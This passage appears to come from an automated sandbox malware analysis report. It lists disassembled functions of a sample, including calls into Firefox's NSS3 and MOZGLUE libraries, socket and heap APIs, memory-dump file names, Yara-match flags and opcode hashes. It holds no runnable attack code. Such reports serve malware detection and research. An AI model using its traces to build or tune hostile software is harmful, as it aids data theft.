                                                                                                                                                                                                              • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBDE9
                                                                                                                                                                                                              • free.MOZGLUE(?,00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBE21
                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,6CBD7AFE,?,?,?,?,?,?,?,?,6CBD798A), ref: 6CBDBE32
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3662805584-0
                                                                                                                                                                                                              • Opcode ID: ac5525a373f9b32f13cd2e81cd6f0cba1a34e7d40d6a9cd3f516a2e560d62747
                                                                                                                                                                                                              • Instruction ID: 0b74e736202f15a1ea838d3c84993493ab3e458c8925756f763a974fbaf8eb15
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac5525a373f9b32f13cd2e81cd6f0cba1a34e7d40d6a9cd3f516a2e560d62747
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 231148B1B312408FDF00DF29C829B02BBB4FB0A764B45002AE60AC7700E739A416DB92
                                                                                                                                                                                                              Function 6CBD7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_Free.NSS3(?), ref: 6CBD7C73
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBD7C83
                                                                                                                                                                                                              • malloc.MOZGLUE(00000001), ref: 6CBD7C8D
                                                                                                                                                                                                              • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CBD7C9F
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBD7CAD
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 105370314-0
                                                                                                                                                                                                              • Opcode ID: 4993a99ac45dce3461ac48dae0876278a64bc9da535c22e318be400359ddd514
                                                                                                                                                                                                              • Instruction ID: 477b1ec94d6cf448fa345db001108fe74aa55b1efdf8ee8db28cbc0adfc91142
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4993a99ac45dce3461ac48dae0876278a64bc9da535c22e318be400359ddd514
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38F0C2B19102966FEB009F7AAC0998B7798EF00265B068435E809D3B00E730F114CAE9
                                                                                                                                                                                                              Function 6CBDADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6CBDA6D8), ref: 6CBDAE0D
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBDAE14
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6CBDA6D8), ref: 6CBDAE36
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBDAE3D
                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,?,6CBDA6D8), ref: 6CBDAE47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 682657753-0
                                                                                                                                                                                                              • Opcode ID: e1a43463eb743f21e30d8a5714e436d232eb5de468e4adfb77da368c3e2a0c3c
                                                                                                                                                                                                              • Instruction ID: b065009924d804a7a2d4bf0d3aa8e73488338c7c7907b818097ddc6ae17373ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1a43463eb743f21e30d8a5714e436d232eb5de468e4adfb77da368c3e2a0c3c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0F675201A02A7CA019F69E8499177BBCFF867747200338F12A83D40D731F121CBD2
                                                                                                                                                                                                              Function 009468A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 009468B5
                                                                                                                                                                                                                • Part of subcall function 00944AE4: __getptd_noexit.LIBCMT ref: 00944AE7
                                                                                                                                                                                                                • Part of subcall function 00944AE4: __amsg_exit.LIBCMT ref: 00944AF4
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 009468CC
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 009468DA
                                                                                                                                                                                                              • __lock.LIBCMT ref: 009468EA
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 009468FE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: 3ac57ed0c2b0d0a678abaa46dca2566de264470c69a34a571c7c183117c03963
                                                                                                                                                                                                              • Instruction ID: 36202aa310b01657ac4a3ad839585c5724f93e47347e2a06d643f2584d5e882b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ac57ed0c2b0d0a678abaa46dca2566de264470c69a34a571c7c183117c03963
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF024B29453108BD720FBB8A803F0E33A0AF80721F200119F000AB2D2CB349840DF5A
                                                                                                                                                                                                              Function 6CA67C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA67D35
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                              • Opcode ID: 4992fe9c272e913c293fd8911e7c9f9919baff5331336fd202a526e03cdb623a
                                                                                                                                                                                                              • Instruction ID: d4325fc70f9bae8fbafb8ad6575373e112b358d4ae401705fe70c40b6130e4c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4992fe9c272e913c293fd8911e7c9f9919baff5331336fd202a526e03cdb623a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41313571E142299BC710CF9EC8809BEB7F1EF88309B590596E554F7B82E271D891CBA0
                                                                                                                                                                                                              Function 0093004C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0093006F
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094ED9D
                                                                                                                                                                                                                • Part of subcall function 0094ED88: __CxxThrowException@8.LIBCMT ref: 0094EDB2
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094EDC3
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 0093010E
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00930122
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                              • API String ID: 2448322171-3788999226
                                                                                                                                                                                                              • Opcode ID: 50852dc28626dc915dd4be79a4de092db8b01e8a239383221faa4906bfffb929
                                                                                                                                                                                                              • Instruction ID: 47995b78a468f7eb43b6f580e52a971d8509471ed7575074c2ff9f48168926f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50852dc28626dc915dd4be79a4de092db8b01e8a239383221faa4906bfffb929
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1331EE76E402168FD714EFACDC55B9E77A5AF88714F11057AE534EB290DA74DC808F40
                                                                                                                                                                                                              Function 6CA56C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA56D36
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CA56D2A
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA56D20
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA56D2F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                              • Opcode ID: 0d38ad3f41c61603381cd896b1dde9f33d2882a8bdd934e9f7c29feb7c76a2e5
                                                                                                                                                                                                              • Instruction ID: 8a1757f7682b9a36b344a3366fb491ead5c18fbf79c4c02282fdb584d5d00809
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d38ad3f41c61603381cd896b1dde9f33d2882a8bdd934e9f7c29feb7c76a2e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4212132600B049BC710CE1AC941B5AB7F2AF80318F68C92CD8599BF51E371F9D9C7A2
                                                                                                                                                                                                              Function 6CB8CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB8CC7B), ref: 6CB8CD7A
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB8CD8E
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB8CDA5
                                                                                                                                                                                                                • Part of subcall function 6CB8CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB8CDB8
                                                                                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB8CCB5
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6CC214F4,6CC202AC,00000090), ref: 6CB8CCD3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6CC21588,6CC202AC,00000090), ref: 6CB8CD2B
                                                                                                                                                                                                                • Part of subcall function 6CAA9AC0: socket.WSOCK32(?,00000017,6CAA99BE), ref: 6CAA9AE6
                                                                                                                                                                                                                • Part of subcall function 6CAA9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CAA99BE), ref: 6CAA9AFC
                                                                                                                                                                                                                • Part of subcall function 6CAB0590: closesocket.WSOCK32(6CAA9A8F,?,?,6CAA9A8F,00000000), ref: 6CAB0597
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                                                                                              • Opcode ID: 2ab97d0166f0efac98bee01e7fb215b2f91442e0f6f34ae5549081522d0b7cb2
                                                                                                                                                                                                              • Instruction ID: 0e2e53393ff310c8cf29187602cb627f9c182180891044d2da855cc98de8ce93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ab97d0166f0efac98bee01e7fb215b2f91442e0f6f34ae5549081522d0b7cb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B1181F5B202C05EDB409F6D9C067563AB8A356218F11117AE40A8BB41E77EEC444BD2
                                                                                                                                                                                                              Function 0092F252 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F257
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094ED9D
                                                                                                                                                                                                                • Part of subcall function 0094ED88: __CxxThrowException@8.LIBCMT ref: 0094EDB2
                                                                                                                                                                                                                • Part of subcall function 0094ED88: std::exception::exception.LIBCMT ref: 0094EDC3
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0092F262
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EDEA
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: __CxxThrowException@8.LIBCMT ref: 0094EDFF
                                                                                                                                                                                                                • Part of subcall function 0094EDD5: std::exception::exception.LIBCMT ref: 0094EE10
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                                                                                                                              • Opcode ID: 86aaf790a29250f28e7674fb0a0add4977387d05168308c37d7f8957f094c278
                                                                                                                                                                                                              • Instruction ID: f884804a0ce5292174eb89d28b82dec6820ed980e356af37f9b149cbc3694a11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86aaf790a29250f28e7674fb0a0add4977387d05168308c37d7f8957f094c278
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BD012A5D1020CB7CB04E7A9D816ECEBBF9AF84714F20027AAA15D3681EA705A014655
                                                                                                                                                                                                              Function 00931D36 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009322D6,?), ref: 00931D41
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00931D48
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00931D59
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                              • Opcode ID: dc90fdbe5febcc99edc094bba105725911959f2e776b7b5b8bb148aa6b8943a4
                                                                                                                                                                                                              • Instruction ID: c87c2295d91d60b7caf2ec1840a0aca7089c540083d92776a10458a402682fa2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc90fdbe5febcc99edc094bba105725911959f2e776b7b5b8bb148aa6b8943a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACD0A73174431477C6101BE6AC0DFA93F1CDB817A7F000020FE0DD61D0C965441497D5
                                                                                                                                                                                                              Function 009213F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00921402
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0092140D
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00921416
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
